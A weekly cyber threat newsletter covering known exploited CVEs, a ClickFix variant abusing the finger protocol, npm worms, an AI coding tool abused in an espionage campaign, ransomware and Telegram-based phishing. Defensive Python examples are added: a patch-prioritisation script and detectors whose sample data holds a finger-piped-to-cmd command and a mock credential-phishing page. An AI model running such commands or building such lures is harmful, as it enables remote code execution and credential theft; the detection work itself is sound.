Cyber Threat Weekly – #103
During the week of November 10th through November 16th, roughly 359 cyber news articles were reviewed. There is a light amount of cyber threat trend and adversarial behavior news to share. Been thinking about the attack surface and its exponential growth.
Complexity and tool sprawl are leading to gaps we struggle to address. AI technology is being rapidly deployed, often without solid governance and guardrails. Identity systems are under attack. Technical debt and legacy systems are detrimental. Balancing business priorities, innovation, and security is tough. At the end of the day, simplicity and a solid security foundation go a long way.
Let’s start with the ‘ClickFix’ technique abusing the ancient ‘finger’ protocol. Then the code repository attack stories, a semi-autonomous attack campaign shared by Anthropic, and Kraken ransomware using a benchmark to choose between partial and full encryption.
Also an updated joint advisory on Akira ransomware. It appears DanaBot has returned. Another phishing campaign tool emerges. Finally, a phishing campaign using self-contained HTML files.
Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!
Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months. We continue to share n-day vulnerabilities being actively exploited. Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs. If it’s in the catalog, it should be patched.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available, since the chance of exploitation is higher once weaponized PoC code is public. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for vulnerabilities that are actively exploited or have weaponized PoC code available.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.
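As an added example (not part of the newsletter or any vendor's tooling), the Python below ranks findings using the priorities above: KEV first, weaponized PoC second, Internet exposure as the tiebreaker within a tier, and a 24-to-48-hour emergency deadline for the first two tiers. The KEV set reuses the five CVEs listed in this issue; the host names, the PoC list, the placeholder CVE ids and the 30-day default deadline are assumptions.

```python
"""Added example (not from the newsletter): rank findings by the
newsletter's priorities -- KEV first, weaponized PoC second, Internet
exposure as tiebreaker -- and assign a patch deadline to each."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample data. The KEV ids are the five listed in this issue;
# the PoC set, hosts and CVE-2025-0001 / CVE-2025-9999 are placeholders.
KEV_CATALOG = {"CVE-2025-21042", "CVE-2025-12480", "CVE-2025-62215",
               "CVE-2025-9242", "CVE-2025-64446"}
WEAPONIZED_POC = {"CVE-2025-64446", "CVE-2025-0001"}

@dataclass
class Finding:
    host: str
    cve: str
    internet_exposed: bool

def priority(f: Finding) -> int:
    """1 = in KEV catalog, 2 = weaponized PoC available, 3 = everything else."""
    if f.cve in KEV_CATALOG:
        return 1
    if f.cve in WEAPONIZED_POC:
        return 2
    return 3

def deadline_hours(f: Finding) -> int:
    """Emergency window: 24h if exposed, 48h if internal, for P1/P2.
    The 30-day default for P3 is an assumption, not from the newsletter."""
    if priority(f) in (1, 2):
        return 24 if f.internet_exposed else 48
    return 30 * 24

def rank(findings, now=None):
    """Return findings as dicts sorted KEV > PoC > rest, exposed first in a tier."""
    now = now or datetime.now(timezone.utc)
    rows = [{
        "host": f.host, "cve": f.cve, "priority": priority(f),
        "exposed": f.internet_exposed,
        "due": now + timedelta(hours=deadline_hours(f)),
    } for f in findings]
    # False sorts before True, so 'not exposed' puts exposed hosts first
    rows.sort(key=lambda r: (r["priority"], not r["exposed"], r["cve"]))
    return rows

# Constructed findings for the demo
SAMPLE = [
    Finding("web-fw-01", "CVE-2025-64446", True),
    Finding("dev-box-07", "CVE-2025-62215", False),
    Finding("lab-vm-03", "CVE-2025-0001", False),
    Finding("kiosk-12", "CVE-2025-9999", True),   # not in KEV or PoC set
]

if __name__ == "__main__":
    for r in rank(SAMPLE):
        print(r["priority"], r["host"], r["cve"],
              "due", r["due"].isoformat(timespec="hours"))
```

Feed it your scanner export and the current KEV catalog instead of the constructed sets; the sort order is what the emergency patching queue should look like.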
CISA Known Exploited Vulnerabilities – November 10th to November 16th:
CVE-2025-21042 – Samsung Mobile Devices Out-of-Bounds Write Vulnerability:
Could allow remote attackers to execute arbitrary code.
CVE-2025-12480 – Gladinet Triofox Improper Access Control Vulnerability:
Allows access to initial setup pages even after setup is complete.
CVE-2025-62215 – Microsoft Windows Race Condition Vulnerability:
Allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-level access.
CVE-2025-9242 – WatchGuard Firebox Out-of-Bounds Write Vulnerability:
May allow a remote unauthenticated attacker to execute arbitrary code.
CVE-2025-64446 – Fortinet FortiWeb Path Traversal Vulnerability:
May allow an unauthenticated attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.
‘ClickFix’ Attack Technique Abuses Ancient ‘Finger’ Protocol
Another variant of the ‘ClickFix’ technique. The attacker abuses the ‘Finger’ protocol to fetch remote scripts and pipes the output to cmd.exe, where it is executed. Threat actors are always innovating; this is an example. With proper outbound filtering based on the principle of least privilege, outbound TCP port 79 (Finger) should be blocked.
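On the detection side, as an added example (not from the newsletter or the cited research), the Python below runs two checks over constructed endpoint and flow records: a process-creation event whose command line pipes finger output into a shell, and an outbound TCP/79 flow that the egress policy allowed. The ‘key=value’ log layout, host names and documentation-range IPs are assumptions, not a real product's schema.

```python
"""Added example (not from the newsletter): flag finger output piped into
a shell, and outbound TCP/79 flows that egress filtering let through.
All records below are constructed for the example."""
import re

# Constructed events in a simple key=value layout (assumed, not a real schema)
EVENTS = [
    'ts=2025-11-12T09:14:03Z host=WS-042 type=process parent=explorer.exe '
    'image=cmd.exe cmdline="cmd.exe /c finger alice@203.0.113.10 | cmd"',
    'ts=2025-11-12T09:14:04Z host=WS-042 type=netflow proto=tcp dst=203.0.113.10 dport=79 action=allow',
    'ts=2025-11-12T09:20:11Z host=WS-017 type=process parent=explorer.exe '
    'image=notepad.exe cmdline="notepad.exe notes.txt"',
    'ts=2025-11-12T09:22:40Z host=WS-017 type=netflow proto=tcp dst=198.51.100.7 dport=443 action=allow',
    'ts=2025-11-12T09:30:00Z host=WS-099 type=netflow proto=tcp dst=203.0.113.10 dport=79 action=deny',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
# finger(.exe) followed later in the same command line by a pipe into a shell
FINGER_PIPE = re.compile(r'\bfinger(\.exe)?\b.*\|\s*(cmd|powershell)', re.IGNORECASE)

def parse(line: str) -> dict:
    """Split a key=value record into a dict, dropping quotes around values."""
    return {k: v.strip('"') for k, v in KV.findall(line)}

def finger_clickfix(evt: dict) -> bool:
    """True when finger output is piped into a shell in one command line."""
    return evt.get("type") == "process" and bool(FINGER_PIPE.search(evt.get("cmdline", "")))

def allowed_finger_egress(evt: dict) -> bool:
    """True for an outbound TCP/79 flow that was permitted: an egress policy gap."""
    return (evt.get("type") == "netflow" and evt.get("proto") == "tcp"
            and evt.get("dport") == "79" and evt.get("action") == "allow")

def triage(lines):
    """Return (rule, host, timestamp) tuples for every matching record."""
    hits = []
    for line in lines:
        evt = parse(line)
        if finger_clickfix(evt):
            hits.append(("finger-piped-to-shell", evt["host"], evt["ts"]))
        elif allowed_finger_egress(evt):
            hits.append(("tcp79-egress-allowed", evt["host"], evt["ts"]))
    return hits

if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(*hit)
```

The second rule is the policy check: a denied TCP/79 flow is the expected outcome and is not reported, while an allowed one means the outbound filter described above is missing on that segment.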
Code Repository Attack Stories
Almost every week we get several stories affecting code repositories. First, a worm affecting the npm registry. A second worm, dubbed ‘IndonesianFoods’, floods the npm registry.
https://www.infosecurity-magazine.com/news/indonesianfoods-npm-worm-44000/
https://www.endorlabs.com/learn/the-great-indonesian-tea-theft-analyzing-a-npm-spam-campaign
Anthropic’s AI Abused in Semi-Autonomous Attack Campaign
A new report released by Anthropic details how a Chinese threat group abused Claude Code to target 30 organizations. Plenty of human support was still required, but this illustrates how far AI has come in a short period.
https://cyberscoop.com/anthropic-ai-orchestrated-attack-required-many-human-hands/
https://www.anthropic.com/news/disrupting-AI-espionage
Benchmarks Used by Kraken Ransomware to Choose Encryption
Researchers share how this threat group benchmarks encryption performance on each machine. A temporary file is created with random data, encrypted in a timed operation, then deleted. The result dictates partial or full encryption.
https://blog.talosintelligence.com/kraken-ransomware-group/
Akira Ransomware Targeting Nutanix AHV with Linux Encryptor
In addition to new tactics, techniques, and procedures (TTPs), the advisory shares how the ransomware actors have encrypted Nutanix VMs. This behavior will most likely be followed by other threat actors. Data exfiltration has occurred in as little as two hours.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a
After Six Months, DanaBot has Returned
In May 2025, law enforcement disrupted DanaBot infrastructure and publicized indictments and seizures, seriously degrading the malware-as-a-service operation. Researchers share a few observed indicators of compromise.
https://x.com/Threatlabz/status/1987965385036230779
Quantum Route Redirect Phishing Tool
Researchers observed this new phishing kit in August. The tool turns more sophisticated campaigns into a simple one-click operation. Capable of bypassing certain email defenses and detecting bots, this is one to watch.
https://www.darkreading.com/endpoint-security/phishing-tool-smart-redirects-bypass-email-security
https://blog.knowbe4.com/quantum-route-redirect-anonymous-tool-streamlining-global-phishing-attack
Self-Contained HTML Files and Telegram Bots
Researchers share a campaign designed to evade defenses and steal corporate credentials. Once the HTML file is opened, a blurred background image is displayed with a centered login modal. If credentials are entered, JavaScript captures the data and sends it to the Telegram Bot API. It is currently targeting Central and Eastern Europe, but that can quickly change to any location.
https://thecyberexpress.com/phishing-telegram-bots-steal-credentials/
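As an added example (not from the newsletter or the cited researchers), the Python below does a static check of an HTML attachment for the pattern just described: a login form inside the file and inline JavaScript that reports to the Telegram Bot API, with the blurred background as a secondary signal. Both sample documents are constructed; the bot token and chat id are placeholders.

```python
"""Added example (not from the newsletter): static triage of a
self-contained HTML attachment for a login form whose inline script
reports to the Telegram Bot API. Sample documents are constructed."""
import re
from html.parser import HTMLParser

# Bot API endpoint shape: https://api.telegram.org/bot<token>/<method>
TELEGRAM_BOT_API = re.compile(
    r"https?://api\.telegram\.org/bot[^/\s\"']+/\w+", re.IGNORECASE)
NETWORK_CALL = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")

class _Collector(HTMLParser):
    """Collects password inputs, form actions, script and style bodies."""
    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.scripts = []
        self.styles = []
        self._tag = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag in ("script", "style"):
            self._tag = tag

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._tag = None

    def handle_data(self, data):
        if self._tag == "script":
            self.scripts.append(data)
        elif self._tag == "style":
            self.styles.append(data)

def scan_html(doc: str) -> dict:
    """Return the collected signals plus a verdict for one HTML document."""
    c = _Collector()
    c.feed(doc)
    js = "\n".join(c.scripts)
    css = "\n".join(c.styles)
    haystack = js + " " + " ".join(c.form_actions)
    telegram = [m.group(0) for m in TELEGRAM_BOT_API.finditer(haystack)]
    result = {
        "password_inputs": c.password_inputs,
        "telegram_endpoints": telegram,
        "inline_network_call": bool(NETWORK_CALL.search(js)),
        "blurred_background": "blur(" in css.replace(" ", "").lower(),
    }
    if c.password_inputs and telegram:
        result["verdict"] = "credential-phish-telegram"
    elif c.password_inputs and result["inline_network_call"]:
        result["verdict"] = "suspicious-login-form"
    else:
        result["verdict"] = "no-match"
    return result

# Constructed lure: blurred background, centered modal, script holding a
# Telegram bot endpoint. Token and chat id are placeholders.
PHISH_SAMPLE = """<html><head><style>
body { background: url(office.jpg) center/cover; filter: blur(6px); }
#modal { position: fixed; top: 40%; left: 40%; }
</style></head><body>
<div id="modal"><form id="login"><input name="user">
<input type="password" name="pass"><button>Sign in</button></form></div>
<script>
var endpoint = 'https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendMessage';
var chat = '<CHAT_ID_PLACEHOLDER>';
/* submit handler would serialize the fields and fetch() them to endpoint */
</script></body></html>"""

# Constructed ordinary login page posting to its own origin
BENIGN_SAMPLE = """<html><body><form action="/login" method="post">
<input name="user"><input type="password" name="pass"><button>Sign in</button>
</form></body></html>"""

if __name__ == "__main__":
    for name, doc in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_html(doc))
```

Run it over HTML attachments pulled from the mail gateway quarantine; a password field plus any api.telegram.org bot endpoint in the same file is enough to block, and the ‘suspicious-login-form’ verdict (password field plus an inline network call, no Telegram URL) is the bucket to review by hand when the kit switches to another drop point.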
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter